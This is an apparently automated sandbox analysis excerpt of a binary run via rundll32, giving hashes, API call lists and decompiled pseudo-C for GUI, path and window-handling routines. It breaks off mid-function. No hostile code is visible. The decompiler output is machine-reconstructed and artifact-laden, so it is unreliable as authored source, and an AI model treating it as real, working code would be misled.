BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00E346B9
SelectPalette.GDI32(?,00000000,000000FF), ref: 00E346CB
SelectObject.GDI32(?,00000000), ref: 00E346D5
DeleteDC.GDI32(?), ref: 00E346F0

Part of subcall function 00E30724: CreateBrushIndirect.GDI32(?), ref: 00E307CE

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 83966ee2530dc898bd28e5ddb013eb5265ab5af29957b603a5e156fd28fca5d5
Instruction ID: 60346f20723ac60773c829fb7e222dae749ca4b58027d045cb2039d5144ce8de
Opcode Fuzzy Hash: 83966ee2530dc898bd28e5ddb013eb5265ab5af29957b603a5e156fd28fca5d5
Instruction Fuzzy Hash: 6C12B6B5A00208AFDB10EFA8C989FDEB7F8AB09314F519555F918AB291C774E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E153C4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00E153C4(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00E153B0(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00E153B0(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00E112A4();
									while( *_t93 != 0) {
										_t90 = E00E153B0(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00E112A4();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00E112AC();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00E112A4();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00E112AC();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00E112A4();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00E112A4();
						}
					}
				}
				L17:
				return _v16;
			}

0x00e153d0
0x00e153d3
0x00e153d9
0x00e153e6
0x00e153ea
0x00e1542c
0x00e15432
0x00e1546f
0x00000000
0x00e15434
0x00e1543b
0x00e1544c
0x00e15451
0x00e15457
0x00e1545f
0x00e15464
0x00e15472
0x00e15474
0x00e1547a
0x00e1547e
0x00e15485
0x00e15486
0x00e15531
0x00e15498
0x00e1549c
0x00e154a9
0x00e154b0
0x00e154b1
0x00e154ba
0x00e154bb
0x00e154d3
0x00e154d8
0x00e154db
0x00e154e0
0x00e154e6
0x00e154e7
0x00e154f7
0x00e154f9
0x00e15509
0x00e15510
0x00e1551a
0x00e1551b
0x00e15520
0x00e15526
0x00e15527
0x00e1552d
0x00e1552f
0x00000000
0x00e1552f
0x00e154f7
0x00e154d8
0x00000000
0x00e154a9
0x00e1553d
0x00e15544
0x00e15548
0x00e15549
0x00e15549
0x00e15464
0x00e15451
0x00e1543b
0x00e153ec
0x00e153f7
0x00e153fb
0x00000000
0x00e153fd
0x00e153fd
0x00e15408
0x00e1540c
0x00e15411
0x00000000
0x00e15413
0x00e15416
0x00e1541d
0x00e15421
0x00e15422
0x00e15422
0x00e15411
0x00e153fb
0x00e1554e
0x00e15557

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00E153E1
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00E153F2
lstrcpyn.KERNEL32(?,?,?,?,00E15624,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00E15422
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00E15486
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681,?,80000001), ref: 00E154BB
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000,00E15681), ref: 00E154CE
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624,00000000), ref: 00E154DB
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?,00E7C0A4,?,00E15624), ref: 00E154E7
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000,?), ref: 00E1551B
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,00000000), ref: 00E15527
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00E15549

Strings

GetLongPathNameA, xrefs: 00E153EC
kernel32.dll, xrefs: 00E153DC
\, xrefs: 00E154F9

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: ce9c767b08ae3fbf4543026003e413b01892f6f02b8cccc2f12b9007a6fd83b7
Instruction ID: 6dfbbfbc01d718ea5d8ff51c500c759894f85833c96c52dba6fb0e39397fe6d6
Opcode Fuzzy Hash: ce9c767b08ae3fbf4543026003e413b01892f6f02b8cccc2f12b9007a6fd83b7
Instruction Fuzzy Hash: BB418F72D00659EFDB10DAA8CC85ADEB7EEEF88304F1410E1A659F7251E630DEC49B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E5D24C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E5D24C(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00E55F80(_t43);
			}

0x00e5d24f
0x00e5d252
0x00e5d262
0x00e5d291
0x00e5d264
0x00e5d264
0x00e5d278
0x00e5d283
0x00e5d284
0x00e5d285
0x00e5d286
0x00e5d286
0x00e5d2a9
0x00e5d2b9
0x00e5d2bd
0x00e5d2c1
0x00e5d2cc
0x00e5d2cc
0x00e5d2bd
0x00e5d2d4
0x00e5d2db
0x00e5d2e5
0x00e5d2f0
0x00e5d300

APIs

IsIconic.USER32 ref: 00E5D25B
GetWindowPlacement.USER32(?,0000002C), ref: 00E5D278
GetWindowRect.USER32 ref: 00E5D291
GetWindowLongA.USER32 ref: 00E5D29F
GetWindowLongA.USER32 ref: 00E5D2B4
ScreenToClient.USER32 ref: 00E5D2C1
ScreenToClient.USER32 ref: 00E5D2CC

Strings

,, xrefs: 00E5D264

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
Instruction ID: f9e2d12bbe8b72fe4ddd7a03d2562d50d02b913862f6478e62dd5b33d9f3d2be
Opcode Fuzzy Hash: 778c72b0bf0b56366e838813fde025b84cde207b933d0b9b3fe142ac1236387a
Instruction Fuzzy Hash: A6118B71504200AFCB51EFACC885ACB77E8AF49310F045A68FD58EB256DB30D9048B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E41FAC Relevance: 9.3, APIs: 6, Instructions: 284
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00E41FAC(intOrPtr __eax, struct HWND__** __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				void* __ebp;
				struct HWND__* _t92;
				intOrPtr _t112;
				intOrPtr _t115;
				struct HWND__* _t121;
				struct HWND__* _t124;
				intOrPtr _t128;
				struct HWND__* _t129;
				intOrPtr _t130;
				intOrPtr _t131;
				struct HWND__* _t133;
				struct HWND__* _t136;
				intOrPtr _t142;
				intOrPtr _t172;
				struct HWND__** _t201;
				struct HWND__* _t219;
				struct HWND__* _t220;
				intOrPtr _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t238;
				intOrPtr _t246;
				struct HWND__* _t250;
				struct HWND__* _t251;
				struct HWND__* _t256;
				struct HWND__* _t257;
				void* _t259;
				void* _t261;
				intOrPtr _t262;
				void* _t264;
				void* _t268;

				_t259 = _t261;
				_t262 = _t261 + 0xffffffec;
				_t201 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t219 = _t92;
				_t264 = _t219 - 0x46;
				if(_t264 > 0) {
					_t220 = _t219 - 0xb01a;
					__eflags = _t220;
					if(_t220 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E00E13470(_v8, __eflags);
						}
					} else {
						__eflags = _t220 == 1;
						if(_t220 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E00E13470(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t264 == 0) {
						_t112 = _v8;
						_t229 =  *0xe423e0; // 0x1
						__eflags = _t229 - ( *(_t112 + 0x1c) &  *0xe423dc);
						if(_t229 == ( *(_t112 + 0x1c) &  *0xe423dc)) {
							_t115 = _v8;
							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
								_t128 = _v8;
								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
								if( *((char*)(_t128 + 0x22b)) != 2) {
									_t129 = __edx[2];
									_t26 = _t129 + 0x18;
									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t121;
							if(_t121 == 0) {
								L30:
								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t124;
								if(_t124 == 0) {
									L32:
									 *( *((intOrPtr*)(_t201 + 8)) + 0x18) =  *( *((intOrPtr*)(_t201 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t124 == 3;
									if(_t124 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t121 == 2;
								if(_t121 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t231 = _t219 + 0xfffffffa - 3;
						if(_t231 < 0) {
							__eflags =  *0xe7c9fc;
							if( *0xe7c9fc != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t130 = _v8;
									__eflags =  *(_t130 + 0x1c) & 0x00000010;
									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t256 = 0;
										_t131 = _v8;
										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
										if( *((char*)(_t131 + 0x22f)) != 2) {
											_t133 =  *(_v8 + 0x220);
											__eflags = _t133;
											if(_t133 != 0) {
												__eflags = _t133 - _v8;
												if(_t133 != _v8) {
													_t256 = E00E5CFE0(_t133);
												}
											}
										} else {
											_t136 = E00E428D8(_v8);
											__eflags = _t136;
											if(_t136 != 0) {
												_t256 = E00E5CFE0(E00E428D8(_v8));
											}
										}
										__eflags = _t256;
										if(_t256 == 0) {
											goto L43;
										} else {
											_t92 = SetFocus(_t256);
										}
									}
								}
							}
							goto L44;
						} else {
							_t232 = _t231 - 0x22;
							if(_t232 == 0) {
								_v24 = __edx[2];
								__eflags = _v24->i - 1;
								if(_v24->i != 1) {
									goto L43;
								} else {
									_t142 = _v8;
									__eflags =  *(_t142 + 0x248);
									if( *(_t142 + 0x248) == 0) {
										goto L43;
									} else {
										_t250 = E00E50074( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t250;
										if(_t250 == 0) {
											goto L43;
										} else {
											_v16 = E00E30840(0, 1);
											_push(_t259);
											_push(0xe42225);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t259);
											_push(0xe42208);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											E00E30DFC(_v16,  *(_v24 + 0x18));
											E00E30C9C(_v16);
											E00E5155C(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t238);
											 *[fs:eax] = _t238;
											_push(0xe4220f);
											__eflags = 0;
											E00E30DFC(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t232 == 1) {
									_t257 = __edx[2];
									__eflags = _t257->i - 1;
									if(_t257->i != 1) {
										goto L43;
									} else {
										_t172 = _v8;
										__eflags =  *(_t172 + 0x248);
										if( *(_t172 + 0x248) == 0) {
											goto L43;
										} else {
											_t251 = E00E50074( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
											__eflags = _t251;
											if(_t251 == 0) {
												goto L43;
											} else {
												_v20 = GetWindowDC(E00E5CFE0(_v8));
												 *[fs:eax] = _t262;
												_v16 = E00E30840(0, 1);
												 *[fs:eax] = _t262;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t262;
												E00E30DFC(_v16, _v20);
												E00E30C9C(_v16);
												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0xe4230f, _t259,  *[fs:eax], 0xe4232c, _t259,  *[fs:eax], 0xe42353, _t259);
												_pop(_t246);
												 *[fs:eax] = _t246;
												_push(0xe42316);
												__eflags = 0;
												E00E30DFC(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t268 = _t92 -  *0xe7fb28; // 0xc075
									if(_t268 == 0) {
										E00E57A98(_v8, 0, 0xb025, 0);
										E00E57A98(_v8, 0, 0xb024, 0);
										E00E57A98(_v8, 0, 0xb035, 0);
										E00E57A98(_v8, 0, 0xb009, 0);
										E00E57A98(_v8, 0, 0xb008, 0);
										E00E57A98(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t92 = E00E5A9F4(_v8, _t201);
									L44:
									return _t92;
								}
							}
						}
					}
				}
			}

0x00e41fad
0x00e41faf
0x00e41fb5
0x00e41fb7
0x00e41fba
0x00e41fbc
0x00e41fbe
0x00e41fc1
0x00e41fe6
0x00e41fe6
0x00e41fec
0x00e42098
0x00e4209f
0x00e420ac
0x00e420ac
0x00e41ff2
0x00e41ff2
0x00e41ff3
0x00e42077
0x00e4207e
0x00e4208b
0x00e4208b
0x00e41ff5
0x00000000
0x00e41ff5
0x00e41ff3
0x00000000
0x00e41fc3
0x00e41fc3
0x00e420b6
0x00e420c4
0x00e420cb
0x00e420ce
0x00e420d4
0x00e420de
0x00e420e0
0x00e420e2
0x00e420e5
0x00e420ec
0x00e420ee
0x00e420f1
0x00e420f1
0x00e420f1
0x00e420f1
0x00e420ec
0x00e420fe
0x00e420fe
0x00e42100
0x00e4210a
0x00e42113
0x00e42113
0x00e42115
0x00e4211f
0x00e42122
0x00e42117
0x00e42117
0x00e42119
0x00000000
0x00000000
0x00e42119
0x00e42102
0x00e42102
0x00e42104
0x00000000
0x00000000
0x00e42104
0x00e42100
0x00000000
0x00e41fc9
0x00e41fcc
0x00e41fcf
0x00e41ffa
0x00e42001
0x00e42007
0x00e4200a
0x00000000
0x00e42010
0x00e42010
0x00e42013
0x00e42017
0x00000000
0x00e4201d
0x00e4201d
0x00e4201f
0x00e42022
0x00e42029
0x00e4204b
0x00e42051
0x00e42053
0x00e42055
0x00e42058
0x00e4205f
0x00e4205f
0x00e42058
0x00e4202b
0x00e4202e
0x00e42033
0x00e42035
0x00e42044
0x00e42044
0x00e42035
0x00e42061
0x00e42063
0x00000000
0x00e42069
0x00e4206a
0x00e4206a
0x00e42063
0x00e42017
0x00e4200a
0x00000000
0x00e41fd1
0x00e41fd1
0x00e41fd4
0x00e4212e
0x00e42134
0x00e42137
0x00000000
0x00e4213d
0x00e4213d
0x00e42140
0x00e42147
0x00000000
0x00e4214d
0x00e42163
0x00e42165
0x00e42167
0x00000000
0x00e4216d
0x00e42179
0x00e4217e
0x00e4217f
0x00e42184
0x00e42187
0x00e42196
0x00e4219b
0x00e4219c
0x00e421a1
0x00e421a4
0x00e421b0
0x00e421c3
0x00e421db
0x00e421e2
0x00e421e5
0x00e421e8
0x00e421ed
0x00e421f2
0x00e42207
0x00e42207
0x00e42167
0x00e42147
0x00e41fda
0x00e41fdb
0x00e4222c
0x00e4222f
0x00e42232
0x00000000
0x00e42238
0x00e42238
0x00e4223b
0x00e42242
0x00000000
0x00e42248
0x00e4225b
0x00e4225d
0x00e4225f
0x00000000
0x00e42265
0x00e42273
0x00e42281
0x00e42290
0x00e4229e
0x00e422aa
0x00e422b8
0x00e422c1
0x00e422d4
0x00e422e7
0x00e422ec
0x00e422ef
0x00e422f2
0x00e422f7
0x00e422fc
0x00e4230e
0x00e4230e
0x00e4225f
0x00e42242
0x00e41fe1
0x00e4235a
0x00e4235a
0x00e42360
0x00e4236e
0x00e4237f
0x00e42390
0x00e423a1
0x00e423b2
0x00e423c3
0x00e423c3
0x00e423c8
0x00e423cd
0x00e423d2
0x00e423d8
0x00e423d8
0x00e41fdb
0x00e41fd4
0x00e41fcf
0x00e41fc3

APIs

SetFocus.USER32(00000000), ref: 00E4206A
SaveDC.GDI32(?), ref: 00E42191
RestoreDC.GDI32(?,?), ref: 00E42202
GetWindowDC.USER32(00000000), ref: 00E4226E
SaveDC.GDI32(?), ref: 00E422A5
RestoreDC.GDI32(?,?), ref: 00E42309

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: b51b803be91febbfeca545cdbdb9fde13a952b6057b5cc269574ab845bf4f53a
Instruction ID: c7dd368aac99d56279161f2ec6fd5262d75b6bfef8dcb14cba67071caa76a723
Opcode Fuzzy Hash: b51b803be91febbfeca545cdbdb9fde13a952b6057b5cc269574ab845bf4f53a
Instruction Fuzzy Hash: 77B19F35A00205DFDB15DF68E896AAEB7F5EF49304FA564A8F904BB361C734AE40DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00E37170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E37170(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0xe7f91d != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E00E370E0( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0xe7f8f8; // 0xe37170
				 *0xe7f8f8 = E00E36F70(1, _t19, _t21, __edi, _t23);
				return  *0xe7f8f8(_t23, _t19);
			}

0x00e37178
0x00e3717b
0x00e37185
0x00e371af
0x00e371c0
0x00e371d3
0x00e371c2
0x00e371c7
0x00e371c7
0x00000000
0x00e371dd
0x00000000
0x00e371b1
0x00e3718c
0x00e37199
0x00000000

Strings

MonitorFromWindow, xrefs: 00E37187
pq, xrefs: 00E3718C, 00E37199, 00E371A0

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: MonitorFromWindow$pq
API String ID: 190572456-709896079
Opcode ID: 01d8752898e48be8b44666c4b1963bfc7e3c6713148d54ef91826dbd55f9fe40
Instruction ID: 69ff29b8bcee9e13808a54fdc91a12c4d4b520c545e9626702a7e2d22aa7a099
Opcode Fuzzy Hash: 01d8752898e48be8b44666c4b1963bfc7e3c6713148d54ef91826dbd55f9fe40
Instruction Fuzzy Hash: D601D6B25091196F9720DB54DC859FF7BECEF41354F506021F894B7201DB349E44D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3C54C Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E3C54C(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0xe3c5c9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E00E3BFAC(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E00E3BBAC(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00E14528(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0xe3c5d0);
				return E00E14068( &_v8);
			}

0x00e3c54f
0x00e3c553
0x00e3c557
0x00e3c558
0x00e3c55d
0x00e3c560
0x00e3c565
0x00e3c56f
0x00e3c571
0x00e3c573
0x00e3c57f
0x00e3c58d
0x00e3c596
0x00e3c59f
0x00e3c5ae
0x00e3c5ae
0x00e3c5b5
0x00e3c5b8
0x00e3c5bb
0x00e3c5c8

APIs

Part of subcall function 00E3BFAC: WinHelpA.USER32 ref: 00E3BFBB

GetTickCount.KERNEL32 ref: 00E3C56A
Sleep.KERNEL32(00000000,00000000,00E3C5C9,?,?,00000000,00000000,?,00E3C542), ref: 00E3C573
GetTickCount.KERNEL32 ref: 00E3C578
WinHelpA.USER32 ref: 00E3C5AE

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CountHelpTick$Sleep
String ID:
API String ID: 2438605093-0
Opcode ID: 6623b75d9d325d57e644a4ca7879a39ecc36cee1e6091956f0f56ff762448aa9
Instruction ID: 9b2e52b6fcd7d175c6e78d510c5ae57d6fccd19d146334df0004e1271826bb26
Opcode Fuzzy Hash: 6623b75d9d325d57e644a4ca7879a39ecc36cee1e6091956f0f56ff762448aa9
Instruction Fuzzy Hash: 3A016D75700304AFE711EBA8CC5BB9DBBE9EB48B04F616461F500F6681DB74AE40D662

Uniqueness

Uniqueness Score: -1.00%

Function 00E5A9F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E5A9F4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00E57054(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00E57B64(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00E5A960(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00E5D240(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E00E5CFE0(_t50);
						_push(_t32);
						L00E167F0();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E00E57B64(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00E16CD8( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E00E56470(_t50,  &_v28,  &_v20);
					_t21 = E00E5A8CC(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E00E3FBE8(__eax);
